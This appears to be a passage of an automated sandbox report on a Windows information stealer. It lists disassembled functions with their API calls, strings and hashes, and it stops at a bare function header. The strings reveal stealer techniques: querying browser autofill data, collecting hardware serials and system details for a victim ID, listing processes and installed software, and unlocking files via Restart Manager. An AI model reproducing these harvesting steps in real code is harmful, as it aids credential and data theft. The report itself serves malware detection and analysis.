_CxxThrowException.VCRUNTIME140(?,005557D8,?,00040004,?,000000FF,00000001,?,?,3A5313C3,?,-00000002,?), ref: 004C507E
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80041015,?,005557D8,?,00040004,?,000000FF,00000001,?,?,3A5313C3,?,-00000002), ref: 004C50AE
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,005557D8,?,80041015,?,005557D8,?,00040004,?,000000FF,00000001,?), ref: 004C50DA
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80041008,?,005557D8,?,00000000,?,005557D8,?,80041015,?,005557D8,?,00040004), ref: 004C510A
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80041006,?,005557D8,?,80041008,?,005557D8,?,00000000,?,005557D8,?,80041015), ref: 004C513A
_CxxThrowException.VCRUNTIME140(?,005557D8,?,8004101D,?,005557D8,?,80041006,?,005557D8,?,80041008,?,005557D8,?,00000000), ref: 004C516A

Strings

Error getting next element: WBEM_E_TRANSPORT_FAILURE, xrefs: 004C5083
Error getting next element: WBEM_E_INVALID_PARAMETER, xrefs: 004C50DF
Error getting next element: WBEM_S_TIMEDOUT, xrefs: 004C5053
Error getting next element: WBEM_E_UNEXPECTED, xrefs: 004C513F
Error getting next element: Unknown Error, xrefs: 004C50B3
Error getting next element: WBEM_E_OUT_OF_MEMORY, xrefs: 004C510F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrow$Xbad_function_call@std@@
String ID: Error getting next element: Unknown Error$Error getting next element: WBEM_E_INVALID_PARAMETER$Error getting next element: WBEM_E_OUT_OF_MEMORY$Error getting next element: WBEM_E_TRANSPORT_FAILURE$Error getting next element: WBEM_E_UNEXPECTED$Error getting next element: WBEM_S_TIMEDOUT
API String ID: 1687517179-3901730267
Opcode ID: 32f6d387e43f79eda7c1d031d9ea773650b24319a7200f4ae7e0725ce7197c52
Instruction ID: adee210919365650a58195d85c1c55467f3005610979dbc63b504ee8e13ce6b3
Opcode Fuzzy Hash: 32f6d387e43f79eda7c1d031d9ea773650b24319a7200f4ae7e0725ce7197c52
Instruction Fuzzy Hash: BA51E275901259AECB00DBE0D965FEEBBB8BF55304F10002FF401B7295EB79AA44C759

Uniqueness

Uniqueness Score: -1.00%

Function 0052A080 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 154
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,004C4445,004C4447,00000000,00000000,3A5313C3,?,00000000,?,005213C5,00555270,000000FE,?,004C4445,?), ref: 0052A109
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,004C4445), ref: 0052A145
MultiByteToWideChar.KERNEL32(00000000,00000000,004C4445,?,00000000,00000000,?,?,?,?,?,004C4445), ref: 0052A184
SysAllocString.OLEAUT32(00000000), ref: 0052A18F
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,004C4445), ref: 0052A1A0
_com_issue_error.COMSUPP ref: 0052A1B8
_com_issue_error.COMSUPP ref: 0052A1C2
GetLastError.KERNEL32(80070057,3A5313C3,?,00000000,?,005213C5,00555270,000000FE,?,004C4445,?), ref: 0052A1C7
_com_issue_error.COMSUPP ref: 0052A1DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,004C4445,?), ref: 0052A1E8
GetLastError.KERNEL32(00000000,?,004C4445,?), ref: 0052A1F0
_com_issue_error.COMSUPP ref: 0052A203

Strings

@MD, xrefs: 0052A23F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWidefree$AllocStringmalloc
String ID: @MD
API String ID: 2710271231-3149783059
Opcode ID: 31e672170133d0c39be2df2627039b9d1e06b542252150aa412417ae94b239ef
Instruction ID: 0390b130e94711bae2efbe0dbd25cd22a5c1a21c8068569c65ba4243db51cc12
Opcode Fuzzy Hash: 31e672170133d0c39be2df2627039b9d1e06b542252150aa412417ae94b239ef
Instruction Fuzzy Hash: 7B410A71A007259BDB10DF64EC49BAEBFA8FF86720F108629F905D72C0D7349814C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00406690 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 004C82F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 004C83B4

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,CurrentTimeZone,0000000F,3A5313C3), ref: 00406726
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,FFFFFFFF,Name,00000004,00000000,00000000,?,CurrentTimeZone,0000000F,3A5313C3), ref: 004067A3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,NumberOfLogicalProcessors,00000019,00000000,00000000,FFFFFFFF,Name,00000004,00000000,00000000,?,CurrentTimeZone,0000000F,3A5313C3), ref: 00406820
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,PrimaryOwnerName,00000010,00000000,00000000,?,NumberOfLogicalProcessors,00000019,00000000,00000000,FFFFFFFF,Name,00000004,00000000), ref: 0040689D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,SystemType,0000000A,00000000,00000000,?,PrimaryOwnerName,00000010,00000000,00000000,?,NumberOfLogicalProcessors,00000019,00000000), ref: 0040691A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,TotalPhysicalMemory,00000013,00000000,00000000,?,SystemType,0000000A,00000000,00000000,?,PrimaryOwnerName,00000010,00000000), ref: 00406990

Strings

Name, xrefs: 00406742
PrimaryOwnerName, xrefs: 0040683C
CurrentTimeZone, xrefs: 004066C8
SystemType, xrefs: 004068B9
NumberOfLogicalProcessors, xrefs: 004067BF
TotalPhysicalMemory, xrefs: 00406936

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove
String ID: CurrentTimeZone$Name$NumberOfLogicalProcessors$PrimaryOwnerName$SystemType$TotalPhysicalMemory
API String ID: 15630516-642476987
Opcode ID: 9ee3b98b931a24ad4f955d028c84350ad64b311eb24f58c892d99a596c2d7ea6
Instruction ID: a15c96a657af769bada05d9ae0499b265b7bd47ac30eb47c5956d2b59c08e9cb
Opcode Fuzzy Hash: 9ee3b98b931a24ad4f955d028c84350ad64b311eb24f58c892d99a596c2d7ea6
Instruction Fuzzy Hash: FA91C471A011089BEB18DFA4DE49BEEBBB6EF85314F20825DE011B72C1DB795E44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 005272E0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 265filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,02000000,00000000,00000002,00000000,3A5313C3,75920630,?), ref: 005273CB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052740A
GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 00527430
CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,02000000,00000000,?), ref: 00527476
GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 005274AC
CopyFileExW.KERNELBASE(00000002,?,005276B0,00000000,00000000,00000000,3A5313C3,75920630,?), ref: 0052757E
GetLastError.KERNEL32 ref: 00527588
GetLastError.KERNEL32 ref: 005275A4
CloseHandle.KERNEL32(?), ref: 005275CF

Part of subcall function 00529AF0: _CxxThrowException.VCRUNTIME140(dIU,00554964,?,?,?,?,?,?,?,?,?,005275F9,00000000,00000002,?,00410D82), ref: 00529B52

CloseHandle.KERNEL32(00000000), ref: 005275DE

Strings

boost::filesystem::copy_file, xrefs: 005275AA, 005275EB

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastTime$CopyExceptionThrow_invalid_parameter_noinfo_noreturn
String ID: boost::filesystem::copy_file
API String ID: 1446533351-1354418677
Opcode ID: 152d92b6df4fff46e7aa4e94e1aed4e81ba2700cda93289b5928b82e09099be0
Instruction ID: 69e0f2a077294466af993573e221dd8105797f91cc04b1408a06d015aa3313b4
Opcode Fuzzy Hash: 152d92b6df4fff46e7aa4e94e1aed4e81ba2700cda93289b5928b82e09099be0
Instruction Fuzzy Hash: 2EA17D70A04218AFDF14DFA8EC89BDEBFB5BF4A314F244219E815A72D0C7749A45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00420DA0 Relevance: 18.4, APIs: 3, Strings: 9, Instructions: 400COMMON

Download Yara Rule

Strings

new, xrefs: 00420E2C
@SC, xrefs: 004215F6
\Temp\, xrefs: 00421362
Proccesses.txt, xrefs: 00421540
proccesses, xrefs: 004218D6
e_user, xrefs: 0041FC3B, 0041FC48, 004202A3, 004202B0, 00420945, 00420952, 004216F7, 00421713
idb, xrefs: 004216BC
hwid, xrefs: 00421764
name, xrefs: 00421809

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmove
String ID: @SC$Proccesses.txt$\Temp\$e_user$hwid$idb$name$new$proccesses
API String ID: 4032823789-2601265028
Opcode ID: 598a8ed59693413243242dd873a686b147a03b3bf8e4972029e9b5574b56a950
Instruction ID: e2dcba374c28604ae605b2540940103b2ba7f7421b8063181974f35cbca15f0a
Opcode Fuzzy Hash: 598a8ed59693413243242dd873a686b147a03b3bf8e4972029e9b5574b56a950
Instruction Fuzzy Hash: 6F024B70D00269DEEB20DF94CD59BDEBBB8AF15304F50419AE10877282D7B95B88CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00527BE0 Relevance: 18.2, APIs: 12, Instructions: 176COMMON

Download Yara Rule

APIs

SetFileInformationByHandle.KERNELBASE(?,00000015,?), ref: 00527C33
GetLastError.KERNEL32 ref: 00527C3D
SetFileInformationByHandle.KERNEL32(?,00000015,?), ref: 00527C77
GetLastError.KERNEL32 ref: 00527C94
SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00527CD0
GetLastError.KERNEL32 ref: 00527CD6
SetFileInformationByHandle.KERNEL32(?,00000004,?,00000001), ref: 00527D2E
GetLastError.KERNEL32 ref: 00527D38
SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00527D6C
SetFileInformationByHandle.KERNEL32(?,00000004,00000001,00000001), ref: 00527D80
GetLastError.KERNEL32 ref: 00527D8A
SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00527D9D

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: FileHandleInformation$ErrorLast
String ID:
API String ID: 3070998852-0
Opcode ID: a9548d639dfe89339a1bc75dca9a9fb796456724a11d039da2f139a334544a72
Instruction ID: dca800cf2d85b172e16e79ec8c8286140d88c0d623ffe34da2e39892383c9750
Opcode Fuzzy Hash: a9548d639dfe89339a1bc75dca9a9fb796456724a11d039da2f139a334544a72
Instruction Fuzzy Hash: D3510472608325ABD620DB289C85B7FBBE8BF8BB50F000919FA41E71D0D761DD048393

Uniqueness

Uniqueness Score: -1.00%

Function 00522840 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

boost::filesystem::directory_iterator::construct, xrefs: 0052288F, 00522E04

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID: boost::filesystem::directory_iterator::construct
API String ID: 0-2022155403
Opcode ID: b4b4caa03cde7c0f4dcbaf0224bc34807e1dade1708c861f227bf80917cd399f
Instruction ID: 7718c4cd12df1f1502ae52d09e4ea8fff24c82d0c9fb284192c2c4aace0f8ace
Opcode Fuzzy Hash: b4b4caa03cde7c0f4dcbaf0224bc34807e1dade1708c861f227bf80917cd399f
Instruction Fuzzy Hash: 19F1DF74D00349EFDB10CFA8D948B9EBFF0BF5A314F108619E455A7691D7B4AA84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004108F0 Relevance: 13.9, APIs: 9, Instructions: 421COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 0041096B
RmStartSession.RSTRTMGR(?,00000000,?,0052CEC3,000000FF), ref: 00410983
RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000), ref: 00410A48
RmGetList.RSTRTMGR(?,?,0000000A,?,?), ref: 00410A82
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410BEB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410C63

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ListRegisterResourcesSessionStartmemset
String ID:
API String ID: 1470211347-0
Opcode ID: 08f86fdd88b4684cf98c7e07730f3223cdaf034a83e736f41b6bd03e7ea78755
Instruction ID: 7b22025ff536d9c4a551e809834eae6d72c367e780d2e1a166ee2d07ae17370e
Opcode Fuzzy Hash: 08f86fdd88b4684cf98c7e07730f3223cdaf034a83e736f41b6bd03e7ea78755
Instruction Fuzzy Hash: ACF1F471A011148BEB18CF18DDC9BDE77B5EF46304F148299E8099B6C6D7B8AAC0CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00416AE0 Relevance: 12.8, APIs: 3, Strings: 4, Instructions: 570COMMON

Download Yara Rule

Strings

<BT, xrefs: 004172E3, 004172F8, 004176E6
\Temp\tmp, xrefs: 00416EB7, 00418A26
\Temp\, xrefs: 0041355F, 004177A2
SELECT name, value FROM autofill, xrefs: 004172FB

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@TimeU?$char_traits@memchr$??1?$basic_ios@??1?$basic_ostream@FileSystemmemmovememset
String ID: <BT$SELECT name, value FROM autofill$\Temp\$\Temp\tmp
API String ID: 4222108042-3962040960
Opcode ID: 8f2f03297cc781f5aa6660a1c3880cf2e4e9da3c3c38033d9377374b50f75b6c
Instruction ID: 84e878521ce3f7ec7a2eb552b8f01f48c0e9d5b8dd6ed03c9a85b5040307dc8e
Opcode Fuzzy Hash: 8f2f03297cc781f5aa6660a1c3880cf2e4e9da3c3c38033d9377374b50f75b6c
Instruction Fuzzy Hash: 1442BD70900258DBEB25DB54CD84BDEBBB6AF45308F5081D9E4087B282DBB95BC8CF65

Uniqueness

Uniqueness Score: -1.00%

Function 023D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 023D024D

Strings

cess, xrefs: 023D018D
kernel32.dll, xrefs: 023D008F, 023D0095

Memory Dump Source

Source File: 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23d0000_16E6.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 090c17577752addc852be46cdb85d1a3ee30e49251c4315ba011aac6367306e5
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 37526975A01229DFDB64CF68D984BACBBB5BF09304F1480D9E94DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0041B8C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 178registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000000,3A5313C3), ref: 0041B92C
RegEnumKeyW.ADVAPI32(00000000,00000000,?,0000020A), ref: 0041B963

Strings

DisplayName, xrefs: 0041BA80

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: EnumOpen
String ID: DisplayName
API String ID: 3231578192-3786665039
Opcode ID: a90353260ab297e634c082b5becbc2f63c27fd8fdac7b830892914a3114a693d
Instruction ID: b4d6b08e5a431608f56d6ece29e01621b0912d2a7a38ad89c809bae0cef16849
Opcode Fuzzy Hash: a90353260ab297e634c082b5becbc2f63c27fd8fdac7b830892914a3114a693d
Instruction Fuzzy Hash: 8C61C6B09012599BEB20DB68DD48BDAB7B4FF44314F1042E9E60CE7291E7749E84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 005278D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00010198,00000007,00000000,00000003,02200000,00000000,3A5313C3,?,?,?,?,?,0053138D,000000FF,?), ref: 00527945
GetLastError.KERNEL32(?,?,0053138D,000000FF,?,?,00554964,boost::filesystem::status), ref: 0052795C
CloseHandle.KERNEL32(00000000,boost::filesystem::status), ref: 005279C4

Strings

boost::filesystem::remove, xrefs: 005279A1, 00527A49

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: boost::filesystem::remove
API String ID: 2528220319-3435932043
Opcode ID: 5d3c55e88e8255c9d3c38b124639f3ab55e5a1e340748b4598bc358029b2a187
Instruction ID: 9aa5c492ae2cce2072d4a2a7aa5b1b5692f37fd0bde997aee96fdf1057eb8588
Opcode Fuzzy Hash: 5d3c55e88e8255c9d3c38b124639f3ab55e5a1e340748b4598bc358029b2a187
Instruction Fuzzy Hash: F4411A76908358ABCF24CB58FC89B6DBFA4FF4B721F244656E804D23D0D3309A84D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(?,?,00000040), ref: 00404DE0
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00404DFD
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,?,?), ref: 00404E25
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(3A5313C3), ref: 00404E6A

Part of subcall function 004051B0: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,3A5313C3,00000000,?,?,0052C216,000000FF,?,00404E7E), ref: 004051E2
Part of subcall function 004051B0: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,0052C216,000000FF), ref: 004051FD
Part of subcall function 004051B0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,0052C216,000000FF), ref: 00405221
Part of subcall function 004051B0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000000,?,?,0052C216,000000FF), ref: 00405242
Part of subcall function 004051B0: std::_Facet_Register.LIBCPMT ref: 0040525B
Part of subcall function 004051B0: ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,0052C216,000000FF), ref: 00405276

?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140 ref: 00404E82
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00404E9A

Strings

Google Chrome, xrefs: 00404DBE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID: Google Chrome
API String ID: 3911317180-3338836597
Opcode ID: 2be0912b5a2da8e99c88ca07ec51367d57e0d207f1746895ae6c0dc6cc7dcfa9
Instruction ID: f78bf6583f191c5fc6e61bd2948c894a48881327bcfae089fdb6dec58b238964
Opcode Fuzzy Hash: 2be0912b5a2da8e99c88ca07ec51367d57e0d207f1746895ae6c0dc6cc7dcfa9
Instruction Fuzzy Hash: 1D413AB5A006058FCB24DF69C844BABBBF4FB48710F10452EE91AE7790DB78A904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00425F90 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(3A5313C3,?,?), ref: 00425FDB
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,?,?), ref: 00425FF9
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,?), ref: 00426023
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?), ref: 0042603D
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000002,?,?,?), ref: 0042607F

Strings

]@, xrefs: 0042600B, 0042608C
@J@, xrefs: 0042602F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
String ID: @J@$]@
API String ID: 1830095303-53148381
Opcode ID: ee7f36b353458bf4bfba60b9a55b6de3dfda1adf1de23e6db8941b14dc0cbaa8
Instruction ID: cb3c76b38bb9a8d071ee28c94d8b9f0509f93e59c5b7aa07786847cc85198c5f
Opcode Fuzzy Hash: ee7f36b353458bf4bfba60b9a55b6de3dfda1adf1de23e6db8941b14dc0cbaa8
Instruction Fuzzy Hash: 294188B8604616DFC714CF89D988B5AFBF8FF59304F20815EE90697391C7B1AA04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041B969 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 200registryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,0000020A,?,00000000,00020019,00000000,3A5313C3), ref: 0041B9F9
RegGetValueW.KERNELBASE(80000002,00000000,DisplayName,0000FFFF,00000000,?,00002000), ref: 0041BA90
memset.VCRUNTIME140(?,00000000,00000050,?,?), ref: 0041BAD4
RegCloseKey.ADVAPI32(00000000,?,00000000,00020019,00000000,3A5313C3), ref: 0041BC06
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 0041BC2A

Strings

DisplayName, xrefs: 0041BA80

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset$CloseValue_invalid_parameter_noinfo_noreturn
String ID: DisplayName
API String ID: 822108642-3786665039
Opcode ID: 793d8ad17e904d5687f49d5919a1a7bc6f70a31cbaff1c7e20d0bdfd5382522e
Instruction ID: 08935d2da0905630c48255c4b4cab4bde48ae08052b74969a783a05ad2e6c320
Opcode Fuzzy Hash: 793d8ad17e904d5687f49d5919a1a7bc6f70a31cbaff1c7e20d0bdfd5382522e
Instruction Fuzzy Hash: 0A71C5B09001599BDB24DB28DD89BDDB7B5EF44314F1041D9E609A7292E738AF88CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00432040 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000013), ref: 004321BB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,SerialNumber,0000000C,00000013), ref: 0043222C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,SerialNumber,0000000C,00000013), ref: 00432262

Strings

Win32_PhysicalMedia, xrefs: 004320A2
Select * From , xrefs: 004320CE
SerialNumber, xrefs: 004321D7

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmove
String ID: Select * From $SerialNumber$Win32_PhysicalMedia
API String ID: 4032823789-1539461776
Opcode ID: 4e33cd6b0dfbbdc3b1d834916a6631a469121733eca18a43244c2ec2b4818473
Instruction ID: 7534ec3da8d1de2aa9f18b7f43464f8f4d8ddb709094562b3a41c3d13010aa19
Opcode Fuzzy Hash: 4e33cd6b0dfbbdc3b1d834916a6631a469121733eca18a43244c2ec2b4818473
Instruction Fuzzy Hash: 01611671D002489BEB08DBA4DE89BDEBFB2EF85304F10825DE011AB2D1DBB95A45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0044A0D0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 178fileCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?), ref: 0044A145
memmove.VCRUNTIME140(?,?,?), ref: 0044A173
ReadFile.KERNELBASE(?,?,?,?,?), ref: 0044A1BE
memset.VCRUNTIME140(?,00000000,?), ref: 0044A294

Strings

delayed %dms for lock/sharing conflict, xrefs: 0044A271
winRead, xrefs: 0044A23C

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$FileReadmemset
String ID: delayed %dms for lock/sharing conflict$winRead
API String ID: 1637205586-3590536915
Opcode ID: 096eeb41b953adb46215817618468c0e383da9e549a244d80f7c8bcbf229538c
Instruction ID: 8c4504e90a1da3f8a474f2a56dce209f722c3ee04e0f762ebca07f03c8cd4d2f
Opcode Fuzzy Hash: 096eeb41b953adb46215817618468c0e383da9e549a244d80f7c8bcbf229538c
Instruction Fuzzy Hash: 7E51BC71A402099BEB04DFA8DC818EEBBB5FF89300F24416BE805E7350D675AD95CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00430C30 Relevance: 10.7, APIs: 7, Instructions: 161COMMON

